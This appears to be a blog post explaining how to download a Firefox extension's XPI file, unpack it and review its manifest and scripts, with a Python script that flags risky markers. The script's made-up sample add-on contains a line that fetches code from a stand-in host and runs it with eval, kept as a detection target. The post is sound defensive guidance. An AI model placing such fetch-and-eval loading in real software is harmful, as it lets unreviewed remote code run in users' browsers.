02 April 2022

Examining the source code of a Firefox addon / extension

When you install a Firefox extension written by someone else, you grant it whatever permissions its manifest declares, and that can include reading and modifying the content of every website you visit. How do you know whether the extension can be trusted?

I recently wanted to check an add-on, and it was possible to do it this way:

First, on the add-on's page at addons.mozilla.org, right-click the "Add to Firefox" button and copy the link. This is the same XPI file Firefox would install, so what you download is what you would be running.


The link I copied is: https://addons.mozilla.org/firefox/downloads/file/3915177/i_dont_care_about_cookies-3.3.7-an+fx.xpi

Open a terminal and use the following command to download the add-on (-L follows any redirect the download link returns; -o sets the output file name):

curl -L -o theAddon.xpi 'https://addons.mozilla.org/firefox/downloads/file/3915177/i_dont_care_about_cookies-3.3.7-an+fx.xpi'


The downloaded add-on is an XPI file (pronounced "zippy"), which is an ordinary ZIP archive, so your existing unzip program can open it.

Just right-click the file and extract it, or run unzip on it from the terminal. The entry to start with is manifest.json at the top level: it declares the permissions the extension requests, which scripts run on which sites (the content_scripts entries and their match patterns) and which scripts run in the background. The META-INF directory holds the signature Mozilla added when it signed the add-on; Firefox verifies that signature at install time, but it says nothing about what the code actually does.


Once extracted, you can examine the source code of the add-on. Note that some authors minify their code, which not only makes it difficult to read but also slows down your text editor when you open the file, because the whole file is one very long line.

So, before opening minified code, run it through a JavaScript pretty-printer or un-minification tool (js-beautify or Prettier, for example) to restore line breaks and indentation. A minified file that is a bundled third-party library (jquery.min.js and the like) can instead be compared byte for byte with the upstream release, which is quicker than reading it.
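The steps above can be automated for a first pass over any XPI. The script below is an added example written for this post, not code from the add-on or from Mozilla: it opens the XPI as a ZIP archive, reads manifest.json, summarises the permissions and host patterns, checks that Mozilla's META-INF signature files are present (presence only, it does not verify the signature), lists the script files, flags files that look minified (a line longer than 500 characters) and flags scripts containing eval, new Function, fetch or XMLHttpRequest, which is where remotely loaded code tends to hide. The sample XPI it builds in memory, including its name, manifest and scripts, is constructed for illustration so the script runs offline; pass a real .xpi path on the command line to inspect a downloaded file instead.

```python
"""Summarise a Firefox XPI for review.

Added example for this post (not Mozilla's code). The sample XPI built by
build_sample_xpi() is constructed for illustration: its manifest, file names
and scripts are made up.
"""
import io
import json
import sys
import zipfile

# Heuristic: any line longer than this is a strong sign of minification.
MINIFIED_LINE_LENGTH = 500
# Markers worth a closer look: dynamic code execution and network fetches.
DYNAMIC_CODE_MARKERS = ("eval(", "new Function(", "fetch(", "XMLHttpRequest")
# Files Mozilla adds when it signs an add-on.
SIGNATURE_FILES = ("META-INF/manifest.mf", "META-INF/mozilla.sf", "META-INF/mozilla.rsa")


def build_sample_xpi() -> bytes:
    """Constructed stand-in for a downloaded .xpi (an ordinary ZIP archive)."""
    manifest = {
        "manifest_version": 2,
        "name": "Example Cookie Banner Hider",  # made-up name
        "version": "1.0.0",
        "permissions": ["storage", "<all_urls>"],  # MV2 keeps host patterns here
        "content_scripts": [{"matches": ["*://*.example.com/*"], "js": ["content.js"]}],
        "background": {"scripts": ["vendor.min.js", "background.js"]},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("manifest.json", json.dumps(manifest))
        z.writestr("content.js", "document.body.classList.add('no-banner');\n")
        # Constructed example of remote code loading: fetch a script and eval it.
        z.writestr("background.js",
                   "fetch('https://updates.example.net/rules.js')"
                   ".then(r => r.text()).then(code => eval(code));\n")
        # One very long line, which is what a minified bundle looks like.
        z.writestr("vendor.min.js", "var a=1;" * 200 + "\n")
        z.writestr("META-INF/manifest.mf", "Manifest-Version: 1.0\n")
        z.writestr("META-INF/mozilla.sf", "Signature-Version: 1.0\n")
        z.writestr("META-INF/mozilla.rsa", b"\x30\x82")  # placeholder bytes
    return buf.getvalue()


def inspect_xpi(xpi_bytes: bytes) -> dict:
    """Return a review summary: permissions, host patterns, scripts, signature
    file presence, minified files and scripts with dynamic-code markers."""
    minified, dynamic = [], {}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        names = z.namelist()
        manifest = json.loads(z.read("manifest.json"))
        for name in names:
            if not name.endswith(".js"):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            if any(len(line) > MINIFIED_LINE_LENGTH for line in text.splitlines()):
                minified.append(name)
            hits = [m for m in DYNAMIC_CODE_MARKERS if m in text]
            if hits:
                dynamic[name] = hits
    permissions = list(manifest.get("permissions", []))
    # MV3 moves host patterns to "host_permissions"; MV2 mixes them into "permissions".
    host_permissions = list(manifest.get("host_permissions", []))
    host_permissions += [p for p in permissions if "://" in p or p == "<all_urls>"]
    content_matches = [
        m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])
    ]
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "permissions": permissions,
        "host_permissions": host_permissions,
        "content_script_matches": content_matches,
        "scripts": sorted(n for n in names if n.endswith(".js")),
        "signature_files_present": all(f in names for f in SIGNATURE_FILES),
        "minified": sorted(minified),
        "dynamic_code": dynamic,
    }


def main(path=None) -> None:
    """Inspect the XPI at `path`, or the constructed sample when no path is given."""
    data = open(path, "rb").read() if path else build_sample_xpi()
    for key, value in inspect_xpi(data).items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

The report is a starting point, not a verdict: a legitimate extension can need <all_urls> and fetch, and a minified file may simply be a bundled library. The point is to know where to look first, then read those files.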


That's it. Examine the source code and see for yourself whether the extension is trustworthy. Keep in mind that you have reviewed one version only: extensions update automatically unless you turn that off for the extension in about:addons, so a later release may contain code you have not seen.

